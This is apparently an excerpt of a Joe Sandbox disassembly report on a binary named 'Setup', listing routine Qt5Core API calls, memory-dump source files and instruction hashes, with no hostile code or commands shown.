                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1619984172-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@ByteV0@@$A@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 101242672-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C5D
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C77
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C85
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23C93
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1A23950,?,?,00000000,00007FFBA1A4140C,?,?,?,?,00000000,?,00007FFBA1A4530E), ref: 00007FFBA1A23CA8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3972277252-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@ByteV0@@$A@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 101242672-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                              • ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                              • ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                              • ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$BasicTimer@@$?current?secs?start@?stop@Object@@@TimeUtc@V1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4246650128-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BD2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BDC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BE6
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BF0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A2187C,?,?,?,?,00007FFBA1A221D5,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A23BFA
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1688221058-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B70
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B80
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B8A
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23B94
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00007FFBA1A1EACA,00007FFBA1A23B4B,?,?,00000000,00007FFBA1A41843), ref: 00007FFBA1A23BA2
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1688221058-0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840C2
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840F7
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1984113
                                                                                                                                                                • Part of subcall function 00007FFBA19D9A90: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,000000E8,00007FFBA1984122), ref: 00007FFBA19D9AAD
                                                                                                                                                                • Part of subcall function 00007FFBA1986880: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA198412A), ref: 00007FFBA19868C3
                                                                                                                                                                • Part of subcall function 00007FFBA1986880: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19868F7
                                                                                                                                                                • Part of subcall function 00007FFBA1986880: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1986904
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846A6
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QUrl@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846B0
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$BasicString@@Timer@@Type@$?normalized?registerFlag@Flags@Mutex@@NormalizedObject@@Object@@@TypeType@@Type@@@@Url@@malloc
                                                                                                                                                              • String ID: 2
                                                                                                                                                              • API String ID: 2739650254-450215437
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Latin1String@@String@@@
                                                                                                                                                              • String ID: ActiveConfiguration$UserChoiceConfiguration
                                                                                                                                                              • API String ID: 2468299162-461075109
                                                                                                                                                              • Opcode ID: 6a8cee516f9e814b53a44dc30a7ae8b0fe3e1768c872ff7caccd7835b98a4484
                                                                                                                                                              • Instruction ID: f4801dc3ef09b429dc270a390d574ba6c8af4ffb2997e287edb95c94aa8d366d
                                                                                                                                                              • Opcode Fuzzy Hash: 6a8cee516f9e814b53a44dc30a7ae8b0fe3e1768c872ff7caccd7835b98a4484
                                                                                                                                                              • Instruction Fuzzy Hash: FF111266609B8492EB618F25E441269A7A0FB9CB98F544235DFDC17B28EF3CD255CF00
APIs
• ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,FFFFFFFF,00007FFBA198A0B2), ref: 00007FFBA198ADC6
• ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,FFFFFFFF,00007FFBA198A0B2), ref: 00007FFBA198ADD6
• ?setErrorString@QIODevice@@IEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,FFFFFFFF,00007FFBA198A0B2), ref: 00007FFBA198ADF3
Strings
• QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once., xrefs: 00007FFBA198ADCF
APIs
• ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA198434C
• ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1984393
• ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA198443E
• ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA19845BD,?,?,?,00007FFBA19714D9), ref: 00007FFBA1984458
APIs
• ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA199350F
• ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FFBA199354F
• ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA19935B0
  • Part of subcall function 00007FFBA19937F0: ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA199382F
  • Part of subcall function 00007FFBA19937F0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA1993845
  • Part of subcall function 00007FFBA19937F0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA1993854
  • Part of subcall function 00007FFBA19937F0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA1993865
  • Part of subcall function 00007FFBA19937F0: ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,00007FFBA19A18DD), ref: 00007FFBA19938F0
  • Part of subcall function 00007FFBA1994020: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1993890,?,?,?,00007FFBA19A18DD), ref: 00007FFBA199404B
  • Part of subcall function 00007FFBA1994020: ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1993890,?,?,?,00007FFBA19A18DD), ref: 00007FFBA1994059
  • Part of subcall function 00007FFBA1994020: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1993890,?,?,?,00007FFBA19A18DD), ref: 00007FFBA1994067
• ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1993603
APIs
  • Part of subcall function 00007FFBA197D9D0: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA197DA08
  • Part of subcall function 00007FFBA197D9D0: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA197DA3B
• ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA19856ED
• ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA1985748
• ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1985767
• ??4QVariant@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1985788
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$V0@@Variant@@$?allocate?detach_helper@?free_helper@?willGrow@Node@Node@1@Node@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3309448406-0
                                                                                                                                                              • Opcode ID: e4cdecf2fe1ea613299e3caff6c461337b7035638c72fc736545cde864e83434
                                                                                                                                                              • Instruction ID: 88954a0f2f97689fcfb71982654888aee97e12d1c1751d6ffc4711785f694c80
                                                                                                                                                              • Opcode Fuzzy Hash: e4cdecf2fe1ea613299e3caff6c461337b7035638c72fc736545cde864e83434
                                                                                                                                                              • Instruction Fuzzy Hash: 3A41797260AA55C6EB91DF26E840039B3A1FB88FD8B498536DE4E47754DF38E856CB00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA19720D0: ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA19720FF
                                                                                                                                                                • Part of subcall function 00007FFBA19720D0: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972118
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA197266C
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972685
                                                                                                                                                              • ??M@YA_NAEBVQString@@0@Z.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA19726D4
                                                                                                                                                              • ?startsWith@QString@@QEBA_NAEBV1@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972740
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?allocate@?data@AllocationData@@@@@Flags@Option@U1@_$?startsCaseQt@@@Sensitivity@String@@String@@0@With@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 606265967-0
                                                                                                                                                              • Opcode ID: 222893d8dedd15edbce94790fc3b2d0ba116e75afda2871a13ca336050a7e897
                                                                                                                                                              • Instruction ID: d707d3a70d7f1929dadafbcee2ac9f557866d78e0ffe2589c862f837fc9439c0
                                                                                                                                                              • Opcode Fuzzy Hash: 222893d8dedd15edbce94790fc3b2d0ba116e75afda2871a13ca336050a7e897
                                                                                                                                                              • Instruction Fuzzy Hash: C231B772B1664645DB92DB26D4001A9A395FF45BE8FC84631DE5D0BBC4DF3DE442CB10
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: V0@@$DateTime@@$BasicTimer@@Url@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1003385927-0
                                                                                                                                                              • Opcode ID: 7997581c6b6480915b240656fe6998afd7a0cf25e81d09609d75de4ac588e4b9
                                                                                                                                                              • Instruction ID: e2a2ac5508dfb2ab7fd3b14e0671bc7c8b564cb4f35947a01140fce9946e9ce6
                                                                                                                                                              • Opcode Fuzzy Hash: 7997581c6b6480915b240656fe6998afd7a0cf25e81d09609d75de4ac588e4b9
                                                                                                                                                              • Instruction Fuzzy Hash: 5A31A3B270AA5697DB92CF35D44016C3360FB44BA8B440032EB5D47BA5DF38E966CB40
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ABEA
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: _Init_thread_footer.LIBCMT ref: 00007FFBA197AC78
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AC89
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ACA1
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: _Init_thread_footer.LIBCMT ref: 00007FFBA197AD1F
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD30
                                                                                                                                                                • Part of subcall function 00007FFBA197ABB0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD48
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1979B37
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1979B45
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1979B97
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1979BA5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Byte$?dispose@ArrayArray@@DataData@1@@Data@@Init_thread_footerListPtr@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 713842530-0
                                                                                                                                                              • Opcode ID: 5e570ceedda3c1830d36b96b1ede7e6490b443053b9d0ce4ec2ab005ad55062c
                                                                                                                                                              • Instruction ID: ff6ab3d0909a5921faa635cb487e086a7d7ba112eeed11c75cd3184e0795c33d
                                                                                                                                                              • Opcode Fuzzy Hash: 5e570ceedda3c1830d36b96b1ede7e6490b443053b9d0ce4ec2ab005ad55062c
                                                                                                                                                              • Instruction Fuzzy Hash: 49319272B0BA428AEBA18F21D5802BD6363FF45BA8FC44131CE5E57654DF2CE446CB10
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?dispose@Data@1@@Data@@ListString@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3454606168-0
                                                                                                                                                              • Opcode ID: c9ee453a6c23b94a0f8dde2f411dfc82bb5b841ceba5a2c506936f8cb8cfba58
                                                                                                                                                              • Instruction ID: bee39e13c2fed6a5db0bff7744e02bd1f7845a425dc57dae53a1e7df428ddbe2
                                                                                                                                                              • Opcode Fuzzy Hash: c9ee453a6c23b94a0f8dde2f411dfc82bb5b841ceba5a2c506936f8cb8cfba58
                                                                                                                                                              • Instruction Fuzzy Hash: 94216272B0A54286E7A68F35E94017D6362FB04FA9B584131CE9D57668DF3CE982CF40
                                                                                                                                                              APIs
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1993D73
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1993D82
                                                                                                                                                                • Part of subcall function 00007FFBA1991640: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA19A1772), ref: 00007FFBA1991653
                                                                                                                                                                • Part of subcall function 00007FFBA1994410: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE(?,?,?,00007FFBA19A16F2), ref: 00007FFBA1994420
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993E87
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QStringRef@@QEAA@XZ.QT5CORE ref: 00007FFBA1993E91
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F35
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QStringRef@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F43
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993F7E
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993F88
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993FE2
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993FEC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993DE5
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1993DF0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@V0@@$?child?data@ArrayArray@@ByteChildData@@DateEvent@Event@@@Object@@Ref@@StringTime@@$?host@ComponentFlags@FormattingOption@Url@@Url@@@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1288083544-0
                                                                                                                                                              • Opcode ID: 4f89a7bd79c910d508725fd5ba1dedc689b4453c5fc429dfddd45550c3d0a5fd
                                                                                                                                                              • Instruction ID: e4b830e305bcf59793bf3ec7d46db09d9456f3b78ca08200179ae4ab3aee4d1e
